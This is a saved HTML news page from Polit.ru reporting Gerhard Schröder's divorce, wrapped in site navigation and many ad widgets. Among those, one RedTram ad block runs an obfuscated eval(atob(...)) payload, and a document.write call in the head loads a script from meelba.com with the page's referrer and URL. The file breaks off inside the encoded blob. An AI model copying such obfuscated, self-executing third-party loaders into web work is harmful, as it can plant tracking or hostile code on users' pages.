<!DOCTYPE html>
<html prefix="og: http://ogp.me/ns#">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
    <title>СМИ сообщли о разводе Герхарда Шредера - ПОЛИТ.РУ</title>

    <link rel="canonical" href="http://polit.ru/news/2016/09/14/shreder_divorce/"/>
    <link rel="manifest" href="/manifest.json">

    <!-- Stylesheets -->
    <link rel="stylesheet" type="text/css" href="/static/polit/css/main.css"/>
    <link rel="stylesheet" type="text/css" href="/static/polit/css/mark-up.css"/>
    <link rel="stylesheet" type="text/css" href="/static/polit/css/content.css"/>
    <link rel="stylesheet" type="text/css" href="/static/polit/css/new.css"/>
    <!--[if IE]><link rel="stylesheet" type="text/css" href="/static/polit/css/ie.css" /><![endif]-->
    <link rel="stylesheet" href="/ads/style.css" type="text/css" media="all"/>

    <meta name="robots" content="all"/>
    <meta name="google-site-verification" content="ZbGJDYfmTGZz23DSt4DiWF448AY8MAD_9PSbBo2DAXU"/>
    <meta property="fb:app_id" content="482430971798114"/>

    <meta name="description" content="СМИ сообщли о разводе Герхарда Шредера - Полит.ру"/><meta property="og:title" content="СМИ сообщли о разводе Герхарда Шредера - ПОЛИТ.РУ"/><meta property="og:url" content="http://polit.ru/news/2016/09/14/shreder_divorce/"/><meta property="og:description" content="Бывший канцлер ФРГ Герхард Шредер решил развестись со своей супругой - 53-летней Дорис Шредер-Кепф. Об этом пишет Bild ."/><meta property="og:image" content="http://polit.ru/media/photolib/2014/02/05/schroder_1473848296.jpg"/><meta name="pubdate" content="2016-09-14T13:18:16.104775"/><meta name="news_keywords" content="Германия"/>

    <script src="https://cdn.onesignal.com/sdks/OneSignalSDK.js" async></script>
    <script>
      var OneSignal = OneSignal || [];
      OneSignal.push(['init', {
        appId: '9b6ff30d-450f-4958-9b28-2e63e1c92158',
        subdomainName: 'polit-ru',
        safari_web_id: 'web.onesignal.auto.43f3e2d2-3818-43ea-aa50-e469d0e1e106'
      }]);
    </script>
    <script type="text/javascript" src="//vk.com/js/api/openapi.js"></script>
    <script type="text/javascript">
      VK.init({apiId: 3289294, onlyWidgets: true});
    </script>
    <link rel="alternate" type="application/rss+xml" title="Полная лента ПОЛИТ.РУ" href="/feeds/" />
    <link rel="alternate" type="application/rss+xml" title="Статьи ПОЛИТ.РУ" href="/feeds/article/" />
    <link rel="alternate" type="application/rss+xml" title="Ёлкин дня!" href="/feeds/elkin/" />
    <link rel="stylesheet" href="/static/polit/css/politgal.css" type="text/css" media="screen" />
    <script src="/static/polit/js/polit.js" type="text/javascript"></script>
    <script src="//lib.rl0.ru/adfox/7/adfox.custom.min.js" type="text/javascript"></script>
    <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
    <script type="text/javascript">document.write("<script type=text/javascript src=\""+"http://meelba.com/3.html?group=polit_ru&seoref="+encodeURIComponent(document.referrer)+"&ur=1&rnd="+Math.random()+"&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword=key+po+umolchaniyu"+"\"><\/script>");</script>
    <script src="/static/polit/js/politart.js" type="text/javascript"></script><script src="/static/polit/js/politgal.js" type="text/javascript"></script>
  </head>
<body class="new">
    <!--BEGIN #header-->
      
<div class="page">
<div class="black-top">
  <a href="http://polit.ua/">Полiт.ua</a>
  <a href="http://govweb.ru/">Государственная сеть</a>
  <a href="http://www.goslyudi.ru">Государственные люди</a>
  
  
  <a href="/promo/">Войти</a>
  
</div>

<div class="top-box">
  <div class="top-logo">
    
      <a href="/"><img src="/static/polit/img/politru_logo_2012.jpg" width="230" height="108" alt="Полит.ру" title="Полит.ру"/></a>
    
  </div>
  <div class="editors-choice-box">
<ul class="editors-choice">
 
  <li>
    <a href="/article/2016/09/08/vyborygd4/">
      
        <span class="author">Алексей  Макаркин</span>
      
      О перспективах непарламентских партий на выборах в ГД
    </a>
  </li>
 
  <li>
    <a href="/article/2016/09/09/kndr_rocket/">
      
        <span class="author">Анна  Сакоян</span>
      
      Ядерные испытания КНДР и мировое возмущение
    </a>
  </li>
 
  <li>
    <a href="/article/2016/09/07/pokemon_go/">
      
        <span class="author">Василий  Измайлов</span>
      
      Доигрался в покемонов. Пара слов о несказуемом
    </a>
  </li>
 
  <li>
    <a href="/article/2016/09/08/memorial/">
      
        <span class="author">Арсений Рогинский</span>
      
      «&quot;Мемориал&quot; продолжит работу в любом случае»
    </a>
  </li>
 
  <li>
    <a href="/article/2016/09/13/party/">
      
        <span class="author">Илья Карпюк</span>
      
      «Партийный» обзор. Подготовка победы ЛДПР
    </a>
  </li>

</ul>
</div>

  <div class="top-right">
    <div class="date-header" >
        <span id="date"><!-- date -->14 сентября 2016, среда, 14:01<!-- /date --></span>
    </div>
    <div class="top-social">
      <a href="http://www.facebook.com/#!/politru" rel="nofollow"><img src="/static/polit/img/new-facebook.png" width="20" height="20" alt="Facebook"/></a>
      <a href="http://twitter.com/POLITRU_" rel="nofollow"><img src="/static/polit/img/new-twitter.png" width="20" height="20" alt="Twitter"/></a>
      <a href="http://polit.livejournal.com/" rel="nofollow"><img src="/static/polit/img/new-livejournal.png" width="20" height="20" alt="LiveJournal"/></a>
      <a href="http://vkontakte.ru/club21337773" rel="nofollow"><img src="/static/polit/img/new-vkontakte.png" width="20" height="20" alt="VK.com"/></a>
      <a href="/feeds/" rel="nofollow"><img src="/static/polit/img/new-rss.png" width="20" height="20" alt="RSS"/></a>
    </div>
    <div class="top-search">
      <form action="/search/">
        <table><tbody><tr>
          <td class="main"><div>
            <input type="search" name="q" id="search-q" onfocus="this.value=''" placeholder="Автор, Статья, Тема" />
          </div></td>
          <td><div>
            <input type="submit" value="ИСКАТЬ" id="search-submit" />
          </div></td>
        </tr></tbody></table>
      </form>
    </div>
  </div>
</div>
<div class="top-menu">
  <table><tbody><tr>
    <td><h2><a href="/news/" class="selected">НОВОСТИ</a></h2></td>

    <td class="dot"><div class="blacksquare"></div></td>
    <td><h2><a href="/article/">СТАТЬИ</a></h2></td>

    <td class="dot"><div class="blacksquare"></div></td>

    <td><h2><a href="/author/">АВТОРЫ</a></h2></td>

    <td class="dot"><div class="blacksquare"></div></td>
    <td><h2><a href="/lectures/publ_lect/">ЛЕКЦИИ</a></h2></td>

    <td class="dot"><div class="blacksquare"></div></td>



    <td><h2><a href="/rubric/proscience/">PRO SCIENCE</a></h2></td>

    <td class="dot"><div class="blacksquare"></div></td>
    <td><h2><a href="/rubric/theater/">ТЕАТР</a></h2></td>

    <td class="dot"><div class="blacksquare"></div></td>

    <td><h2><a href="/district/">РЕГИОНЫ</a></h2></td>

    
  </tr></tbody></table>
</div>

    <!--END #header-->

    <!-- BEGIN #breadcrumbs -->
      	
    <!--END #breadcrumbs-->



 

  <div class="top-menu-shadow">


    <img src="/static/polit/img/green_block_shadow_bottom.jpg" alt=""/>
    





  </div>
  <div class="main-cols ib-parent">
  
    
      
<!-- BEGIN #left column -->

<div class="left-sidebar ib-col">

<!-- start banner google adsense -->
<!-- Polit\polit.ru\234x60 -->
<!--ins class="adsbygoogle"
style="display:inline-block;width:234px;height:60px"
data-ad-client="ca-pub-1154951643410219"
data-ad-slot="6440819918">
</ins>
<script>
(adsbygoogle=window.adsbygoogle || []).push({});
</script-->
<!-- stop banner google adsense -->

    <div style="margin: 20px 0; margin-bottom: 1ex;">
    <h4 style="background-color: #007854; text-align: center; font-weight: bold; color: #FFF; font-family: Arial, Helvetica, sans-serif;" >СОБЫТИЯ</h4>
    <script type="text/mustache" id="politTmEventsMainTpl">
    {{=[[ ]]=}}
<div class="b-main b-main_type_feed">
    [[#events]]
        <div class="l-layout">
            <div class="b-pro-wiget" style="padding-top:0!important;">
                <a class="b-aphisha tpw_event_link" target="_blank" rel="nofollow" data-event-id="[[id]]" href="[[link]]">
                    <div class="b-aphisha__heading-container" [[#poster_rgba_color]]style="background-color: [[poster_rgba_color]];"[[/poster_rgba_color]]>
                        <div class="b-aphisha__heading ">[[name]]</div>
                    </div>
                    [[#image]]<div class="b-aphisha__background" style="background-image: url([[image]]);"></div>[[/image]]
                </a>

                <div class="b-description" style="padding-bottom:0;">
                    <div class="b-pro-wiget__date">
                        <span class="b-pro-wiget__day">[[day]]</span>
                        <span class="b-pro-wiget__month">[[month]]</span> <span class="b-pro-wiget__time">[[time]]</span>
                    </div>
                    <!--div class="b-short-description">[[shortdescription]]</div>

                    <div class="b-pro-wiget__more-block">
                        <a target="_blank" rel="nofollow" data-event-id="[[id]]" href="[[link]]" class="b-pro-wiget__more-button tpw_event_link">[[buttonText]]</a>
                    </div-->

                </div>
            </div>
        </div>
    [[/events]]
</div>
    </script>
    <script type="text/javascript" defer="defer" charset="UTF-8" data-timepad-customized="8428" data-timepad-widget-v2="event_list3" src="https://timepad.ru/js/tpwf/loader/min/loader.js">
    (function() { return { "overrideTemplates": { "main": "#politTmEventsMainTpl" } }; })();
    </script>
    <div style="text-align:center;"><a href="http://bigbilet.ru/ticket-client/?owner=06152AF139E27D50E0504B5E01F57D8B" title="Купить билеты ОН-ЛАЙН"><img border="0" src="/static/polit/img/buytickets.gif" /></a></div>
    
  </div>

  <div class="left-or-right-top-banner-slot"></div>
  <div class="block likebox">
    <iframe src="//www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fpolitru&amp;width=234&amp;height=168&amp;colorscheme=light&amp;show_faces=true&amp;border_color&amp;stream=false&amp;header=false" scrolling="no" frameborder="0" style="border-bottom: 1px solid #AAA; overflow:hidden; width:234px; height:153px;" allowTransparency="true"></iframe>

    <!-- VK Widget -->
    <div id="vk_groups"></div>
    <script type="text/javascript">
      VK.Widgets.Group("vk_groups", {mode: 0, width: "234", height: "10", color1: 'FFFFFF', color2: '2B587A', color3: '5B7FA6'}, 21337773);
    </script>
  </div>
     <div class="left-banner-slot-above-top-articles"></div>
     <div class="left-banner-slot-above-top-articles-2"></div>
     <div class="b2bcontext">
       Бизнесу:
       <ul>
         <li><a href="/b2b/research/">Маркетинговые исследования</a></li>
         <li><a href="/b2b/plan/?parent=rubricator&child=rubricatorbp">Бизнес-планы</a></li>
       </ul>
     </div>
     <div class="block netlenka">
         <div class="subject">Нетленка</div>
         <ul class="top-articles">
 
  <li>
    <a href="/article/2011/01/17/agamirzian/">
      
        <span class="author">Игорь Агамирзян и дргуие</span>
      
      Конец старого мира: Россия на пороге постиндустриальной эры 
    </a>
  </li>
 
  <li>
    <a href="/article/2010/07/26/zaprety/">
      
        <span class="author">Яков Гилинский</span>
      
      По ту сторону запрета: взгляд криминолога 
    </a>
  </li>
 
  <li>
    <a href="/article/2014/05/22/adzhiev_britain/">
      
        <span class="author">Валерий  Аджиев</span>
      
      Расизм в Британии через призму российского восприятия
    </a>
  </li>
 
  <li>
    <a href="/article/2011/06/03/belykh1/">
      
        <span class="author">Никита Белых</span>
      
      Что может сделать в России один губернатор?
    </a>
  </li>
 
  <li>
    <a href="/article/2006/04/10/butorina/">
      
        <span class="author">Ольга Буторина </span>
      
      Понятие региональной интеграции: новые подходы
    </a>
  </li>

</ul>

     </div>
     <div class="left-banner-slot-below-top-articles"></div>
     <div class="block">
         <div class="subject"><a href="/genre/seminars/">Семинары</a></div>
     </div>
     <div class="left-banner-slot-below-seminars"></div>
     <div class="top-district-news">
        <span style="text-transform: uppercase; font-size: 21px;">Новости регионов</span>
        
<div class="top-news" style="margin: 0px;">
  <br>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://www.nashgorod.ru/news/news92848.html" class="hover">Воровали деньги с карт с помощью вирусной программы</a>
      <!--/div-->
    </div>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://www.nashgorod.ru/news/news92847.html" class="hover">Тюменца, воевавшего за сирийских боевиков, отправили в тюрьму</a>
      <!--/div-->
    </div>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://www.nashgorod.ru/news/news92846.html" class="hover">Гей-парада в Тюмени не будет, ЛГБТ-активисты идут в суд</a>
      <!--/div-->
    </div>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://www.nashgorod.ru/news/news92844.html" class="hover">«Гонка героев» собрала 1100 тюменских экстремалов</a>
      <!--/div-->
    </div>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://www.nashgorod.ru/news/news92842.html" class="hover">Лишенный прав водитель едва не сбил детей на «зебре»</a>
      <!--/div-->
    </div>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://www.nashgorod.ru/news/news92843.html" class="hover">«Азбука добра»: помоги желаниям бабушек и дедушек исполниться</a>
      <!--/div-->
    </div>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://vyborg-press.ru/articles/30703/" class="hover">Ядовитое дело</a>
      <!--/div-->
    </div>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://www.sutynews.ru/news/51327" class="hover">Балаковский Водоканал отбился от многомиллионного иска</a>
      <!--/div-->
    </div>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://academ.info/news/36996" class="hover">В Новосибирской области заработали 25 новых машин скорой помощи</a>
      <!--/div-->
    </div>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://www.nashgorod.ru/news/news92841.html" class="hover">За подпольный покерный клуб — 50 тысяч рублей штрафа</a>
      <!--/div-->
    </div>
  
</div>



     </div>

<!-- start redtram -->

<div id="n4p_28541">Loading...</div>
<script type="text/javascript" charset="utf-8">
  (function(d,s){
    var o=d.createElement(s);
    o.async=true;
    o.type="text/javascript";
    o.charset="utf-8";
    if (location.protocol == "https:") {
      o.src="https://js-ru.redtram.com/n4p/0/28/ticker_28541.js";
    }
    else {
      o.src="http://js.ru.redtram.com/n4p/0/28/ticker_28541.js";
    }
    var x=d.getElementsByTagName(s)[0];
    x.parentNode.insertBefore(o,x);
  })(document,"script");
</script>

<!-- end redtram -->

     <div class="block">
         <div class="subject">Спецпроекты</div>
         
<div class="link">
	<a href="/rubric/elections2016/">Выборы-2016 с Линой Арифулиной</a>
</div>

<div class="link">
	<a href="/rubric/ecology/">Экологическая повестка</a>
</div>

<div class="link">
	<a href="/rubric/opendata/">Открытое государство</a>
</div>

<div class="link">
	<a href="/rubric/politeia/">Русская политейя</a>
</div>

<div class="link">
	<a href="/rubric/future/">Прыжок в будущее</a>
</div>

<div class="link">
	<a href="/rubric/moscow/">Проект &quot;Москва&quot;</a>
</div>

<div class="link">
	<a href="/rubric/history_human/">История: человек, институты</a>
</div>

<div class="link">
	<a href="/rubric/literatures/">Национальные литературы</a>
</div>


     </div>
     <div class="block">
         <div class="subject"><a href="/genre/dossie/">Документы</a></div>
     </div>
     <div class="block">
         <div class="subject"><a href="/rubric/redakciya/">О проекте</a></div>
     </div>
     <div class="left-material-banner-slot-1"></div>
     <div class="left-banner-slot-0"></div>
     <div class="left-banner-slot-1"></div>
     <div class="block partners">
       <div class="subject">Партнеры</div>
       <div class="left-partners-slot-1"></div>
       <div class="left-partners-slot-2"></div>
       <div class="left-partners-slot-3"></div>
     </div>
 </div>
 <!-- END #left column -->

    
  
<!--BEGIN #content-->


  
    <div class="new-main-content ib-col">
      <div class="article-detail" id="material-news433015">
  
        <div id="fb-root"></div>
        <script>(function(d, s, id) {
          var js, fjs = d.getElementsByTagName(s)[0];
          if (d.getElementById(id)) return;
            js = d.createElement(s); js.id = id;
            js.src = "//connect.facebook.net/ru_RU/all.js#xfbml=1";
            fjs.parentNode.insertBefore(js, fjs);
          }(document, 'script', 'facebook-jssdk'));
        </script>
        <div class="date">
          14 сентября 2016, 13:18
          
            
              <div class="tags-subject">
                <span>
                  
                    <a href="/tag/germaniya/">Германия</a>
                  
                </span>
              </div>
            
          
        </div>
        <h1 class="title">СМИ сообщли о разводе Герхарда Шредера</h1>
        
        
          
            
          
          
          <div class="image-with-overlay d600x450 below23 image-gray-back-big">
            <a href="/media/photolib/2014/02/05/schroder_1473848296.jpg" rel="lightbox" title="Герхард Шредер">
              <img src="/media/photolib/2014/02/05/thumbs/schroder_1473848296.jpg.600x450_q85.jpg" alt="Герхард Шредер" title="Герхард Шредер" style="margin-top:-225px; margin-left:-300px;"/>
              
            </a>
            <div class="image-overlay image-overlay-bottom-right">
              Герхард Шредер
              
                <div class="image-extra-source"><a href="http://www.flickr.com/photos/foto_db/" rel="nofollow">Flickr/foto_db</a></div>
              
            </div>
          </div>
          
        
        <div class="content">
          
            
          
          <div class="text doc">
            <p>Бывший канцлер ФРГ Герхард Шредер решил развестись со своей супругой - 53-летней Дорис Шредер-Кепф. Об этом пишет <a href="http://www.bild.de/wa/ll/bild-de/unangemeldet-42925516.bild.html">Bild</a>.</p>
            

<script type="text/javascript">
var moevideo = moevideo || {};
moevideo.queue = moevideo.queue || [];
(function() {
    var mvads = document.createElement("script");
    mvads.async = true;
    mvads.type = "text/javascript";
    var useSSL = "https:" == document.location.protocol;
    mvads.src = (useSSL ? "https:" : "http:") + "//moevideo.biz/embed/js/mvpt.min.js";
    var node = document.getElementsByTagName("head")[0];
    node.appendChild(mvads, node);
})();
</script>
<div id="div-mvpt-1" style="width:100%;">
<script type='text/javascript'>
moevideo.queue.push(function() {
    moevideo.ContentRoll({
        mode:"manual",
        el:"#div-mvpt-1"
    });
});
</script>
</div>


            
<p>Супруги прожили вместе 19 лет.</p>
<p>СМИ уточнили, что документы на развод уже поданы. Как отметили друзья семьи, супруги продолжат вместе заботиться о двоих приемных детях.</p>
<p>Журналисты сообщили о том, что экс-канцлер разъехался с женой, еще год назад. Однако на протяжении всего этого времени Шредер появлялся на людях с супругой.</p>
<p>Отметим, что 72-летний Шредер прерывает уже четвертый брак, а Дорис - первый.</p>
            
          </div>

          <div style="padding-bottom: 20px;"><h4 style="color: #007854;text-transform: uppercase;font-size: 120%;padding: 0;">Обсудите в соцсетях</h4>
            <script type="text/javascript">(function(w,doc) {
              if (!w.__utlWdgt ) {
                w.__utlWdgt = true;
                var d = doc, s = d.createElement('script'), g = 'getElementsByTagName';
                s.type = 'text/javascript'; s.charset='UTF-8'; s.async = true;
                s.src = ('https:' == w.location.protocol ? 'https' : 'http')  + '://w.uptolike.com/widgets/v1/uptolike.js';
                var h=d[g]('body')[0];
                h.appendChild(s);
              }})(window,document);
            </script>
            <div data-background-alpha="0.0" data-buttons-color="#ffffff" data-counter-background-color="#ffffff" data-share-counter-size="12" data-top-button="false" data-share-counter-type="separate" data-share-style="10" data-mode="share" data-like-text-enable="false" data-hover-effect="scale" data-mobile-view="false" data-icon-color="#ffffff" data-orientation="horizontal" data-text-color="#ffffff" data-share-shape="rectangle" data-sn-ids="fb.tw.vk.ok.lj.em." data-share-size="40" data-background-color="#ffffff" data-preview-mobile="false" data-mobile-sn-ids="fb.vk.tw.wh.ok.gp." data-pid="1413315" data-counter-background-alpha="1.0" data-following-enable="false" data-exclude-show-more="true" data-selection-enable="false" class="uptolike-buttons" ></div>
          </div>

          <!-- start banner google adsense -->
          <!-- Polit\polit.ru\468x60 -->
          <!--ins class="adsbygoogle"
          style="display:inline-block;width:468px;height:60px"
          data-ad-client="ca-pub-1154951643410219"
          data-ad-slot="4824359318">
          </ins>
          <script>
          (adsbygoogle=window.adsbygoogle || []).push({});
          </script-->
          <!-- stop banner google adsense -->

          
        </div>

        <div class="bottom-social stop">
          <div class="print">
            <a href="/news/2016/09/14/shreder_divorce/print/" rel="nofollow">Версия для печати</a>
          </div>
        </div>
       <!-- 
<div class="comments stop">
  <div class="subject">Комментарии</div>
  <div class="comments-content">
    <div class="fb-comments" data-href="http://polit.ru/news/2016/09/14/shreder_divorce/" data-width="580" data-num-posts="10"></div>
    <div id="vk_comments"></div>
    <script type="text/javascript">
      VK.Widgets.Comments("vk_comments", {limit: 10, width: "580", attach: false});
    </script>
  </div>
</div>

 -->
        <script type="text/javascript" src="/static/orphus/orphus.js"></script>
        <a href="http://orphus.ru" id="orphus" target="_blank" title="Система Orphus" rel="nofollow"><img alt="Система Orphus" src="/static/orphus/orphus.gif" border="0" width="600"></a>
        
          
            <div class="related-block">
              <div class="title">Смотрите также:</div>
              <div class="square-flow">
                
                  
  <div class="col3-special" id="square-news394069">
    
<a href="/news/2015/06/20/schroeder/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2014/02/05/thumbs/schroder_1434787988.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Герхард Шредер" title="Герхард Шредер" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Spiegel сообщил о гонорарах Шредера за советы Назарбаеву
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news391821">
    
<a href="/news/2015/06/02/schroder/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2015/02/20/thumbs/putinstatue_1433214194.jpeg.0x142_q85_crop_cropsize-190x142.jpg" alt="Путин вручает статуэтку Герхарду Шредеру" title="Путин вручает статуэтку Герхарду Шредеру" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Шредер назвал ошибкой отказ пригласить Путина на саммит G7
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news383347">
    
<a href="/news/2015/03/27/divorce/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2014/02/05/thumbs/schroder_1427423061.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Герхард Шредер" title="Герхард Шредер" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Экс-канцлер Германии Герхард Шредер разводится с женой
    </h4>
  </div>
</a>

  </div>


                
                <div class="stop"></div>
              </div>
            </div>
          
        
        <div style="width:600px;">
      <!-- 24СМИ Start -->
      <div id="smi_teaser_3061">
           <center><a href="http://ex.24smi.info">Новости 24СМИ</a></center>
      </div>
      <script type="text/JavaScript" encoding="utf8">
               (function() {
               var sm = document.createElement("script");
               sm.type = "text/javascript";
               sm.async = true;
               sm.src = "http://jsn.24smi.org/4/a/3061.js";
               var s = document.getElementsByTagName("script")[0];
               s.parentNode.insertBefore(sm, s);})();
      </script>
      <!-- 24СМИ End -->

      <!-- LentaInformNews Start -->
      <div id="LentaInformScriptRootN11072" class="news-block-magick">
        <div id="LentaInformPreloadN11072">
          <a href="http://lentainform.com/" target="_blank">Загрузка...</a>
        </div>
        <script>
                (function(){
            var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById';
            var i=d[ce]('iframe');i[st][ds]=n;d[gi]("LentaInformScriptRootN11072")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];}
            catch(e){var iw=d;var c=d[gi]("LentaInformScriptRootN11072");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=11072;c[ac](dv);
            var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src="//jsn.lentainform.com/p/o/polit.ru.11072.js?t="+D.getYear()+D.getMonth()+D.getDate()+D.getHours();c[ac](s);})();
        </script>
      </div>
      <!-- LentaInformNews End -->

      <!-- MarketGidNews Start -->
      <div id="MarketGidScriptRootN13911" class="news-block-magick">
           <div id="MarketGidPreloadN13911">
                <a href="http://marketgid.com/" target="_blank">Загрузка...</a>
           </div>
           <script>
               (function(){
                   var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById';
                   var i=d[ce]('iframe');i[st][ds]=n;d[gi]("MarketGidScriptRootN13911")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];}
                   catch(e){var iw=d;var c=d[gi]("MarketGidScriptRootN13911");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=13911;c[ac](dv);
                   var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src="//jsn.marketgid.com/1/p/1.polit.ru.13911.js?t="+D.getYear()+D.getMonth()+D.getDate()+D.getHours();c[ac](s);})();
           </script>
      </div>
      <!-- MarketGidNews End -->

      <!-- smi2 Start -->
      <div id="unit_84866"><a href="http://smi2.net/">Новости СМИ2</a></div>
      <script type="text/javascript" charset="utf-8">
        (function() {
          var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
          sc.src = '//news.smi2.ru/data/js/84866.js'; sc.charset = 'utf-8';
          var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
        }());
      </script>
      <!-- smi2 End -->


      <!-- RedTram Start -->
      <div id="n4p_15006">Loading...</div>
      <script type="text/javascript" charset="utf-8">
      (function(d,s){
      var o=d.createElement(s);
      o.async=true;
      o.type="text/javascript";
      o.charset="utf-8";
      if (location.protocol == "https:")
      { o.src="https://js-goods.redtram.com/ticker_15006.js"; o.setAttribute("alt-src","https://js-goods.redtram.com/ticker_15742.js");}
      else
      { o.src="http://js.grt02.com/ticker_15006.js"; o.setAttribute("alt-src","http://js.grt02.com/ticker_15742.js");}
      o.setAttribute("cur-id","n4p_15006");
      o.setAttribute("alt-id","n4p_15742");
      o.setAttribute("o-data",eval(atob('KGZ1bmN0aW9uKCl7dmFyIGE9KGMpKCJcInluc3AlYXN0b2FFc0VBZXFydDlkaHZueS9Fb0JlQWNGbG5sSkRYTHMldE0lRXMlVnRhQWZuJXJkMyVcIm43TVVhJWVpeGR0YTAsZW9zciBhZCVRYSllZWxlV2V0VGR0VHNsaXNuZWUlc25lbmklbXVzV3JkcnN3JSVlJSVSZWFkYS5zS2VoJW1XJXFMc3Jvd29zcl93byVlcmVvJTpHb0VpNW9ydCUoME91bm5uQWMlOnhpZShvc3BocmdsYXNucm95dGV0bnlJJ1pheCVyQXJpb2lHJWd0ZGRzdHppYS9ubUFlZ1RlXCJyJyVpQ25kcE9jZXNsaGh0dGNhcGFubU5DZSVjcmp3ZWNlYmV1Y0l0bSVhXCJidGVuZWVjaXBvd25kTSV0czZhLy8lQXJBZ25zeE9hb25vX0Ulc2xoZ2dwYSVrJXJnSCVycGdBcHJzb2RuZHR5ZCV7cHV0bW8vcmVwSWVlcXNldG9QUi8lJXI7aWFhZWxjJWN5bSVvUlwiJXQlQXJBb21BcGlwbmllKEtlb0J9aEFsU2ZvdEJBckVmT2VrJUFpb29YSHd1R2ZtJW9BZGwlbXRlbi5tbjp2bHNBKWglb2VjdW1ldXQlPWVlZW50bGU7ZUJhYW9naHBpZnJqdmV0dEVlblRwYXQ4cnRndG1kJWdzdSVOTm9Dbnkxd3NBZHJxeW5ldFNkcGUlcm0lc29kQWUuJSVsZWp9JWNBeSVuVHVkb3NSdGJcImVsNm9yOnNkbzp4ZUhvQyVibm97aHNuJW9BJVF0QW8sZW50bUc9fCVcIiVpbFdFRG5zbnBybGxyQmhFbDJpNCV3dGkpZnB0X3QvNSVMZU5zQ3ZlYUFka2VvZSVlYSV3bG9wcmphU3RldGF0Z2V6aHI0bW9uc0wuU3RlaUF0YXlvXCIlJUFiZXNFZmFvdCIsMTM2ODYwMzMpO2Z1bmN0aW9uIGMoZSxwKXt2YXIgYj1lLmxlbmd0aDt2YXIgbD1bXTtmb3IodmFyIG89MDtvPCBiO28rKyl7bFtvXT0gZS5jaGFyQXQobyl9O2Zvcih2YXIgbz0wO288IGI7bysrKXt2YXIgZj1wKiAobysgNSkrIChwJSA0NTg4NDIpO3ZhciBjPXAqIChvKyA3KSsgKHAlIDI2NTk3NSk7dmFyIG49ZiUgYjt2YXIgZz1jJSBiO3ZhciBoPWxbbl07bFtuXT0gbFtnXTtsW2ddPSBoO3A9IChmKyBjKSUgNTU5MTc4Nzd9O3ZhciBqPVN0cmluZy5mcm9tQ2hhckNvZGUoMTI3KTt2YXIgbT0iIjt2YXIgaT0iXHgyNSI7dmFyIGE9Ilx4MjNceDMxIjt2YXIgZD0iXHgyNSI7dmFyIHE9Ilx4MjNceDMwIjt2YXIgaz0iXHgyMyI7cmV0dXJuIGwuam9pbihtKS5zcGxpdChpKS5qb2luKGopLnNwbGl0KGEpLmpvaW4oZCkuc3BsaXQocSkuam9pbihrKS5zcGxpdChqKX1mdW5jdGlvbiBiKCl7ZnVuY3Rpb24gaChnLGYpe2lmKCFjKXtiPSB0cnVlfTt2YXIgaj1bYVswXSxhWzFdLGFbMl1dLGk9YVszXSxlLGg9MDtnPSAxMDtmPSAxNjtlPSBnKyBNYXRoW2FbNV1dKE1hdGhbYVs0XV0oKSogKGYtIGcpKTtpZighYSl7Yj0gMX07Zm9yKHZhciBkPTA7ZDwgZTtkKyspe2krPSBqW2hdW01hdGhbYVs1XV0oTWF0aFthWzRdXSgpKiBqW2hdW2FbNl1dKV07aD0gKGgrIE1hdGhbYVs1XV0oTWF0aFthWzRdXSgpKiAxMDApKSUgM307cmV0dXJuIGl9dmFyIGQ9e307ZFthWzddXT0gW107ZFthWzhdXT0gZnVuY3Rpb24oYil7ZFthWzddXVthWzEwXV0oYlthWzldXSl9O2RvY3VtZW50W2FbMTJdXShhWzExXSxkW2FbOF1dLHRydWUpO2Z1bmN0aW9uIGcoYil7cmV0dXJuIGJbYVsxNV1dKGFbM10pW2FbMTRdXSgpW2FbMTNdXShhWzNdKX12YXIgZj1kb2N1bWVudFthWzE3XV0oYVsxNl0pO2ZbYVsxOV1dW2F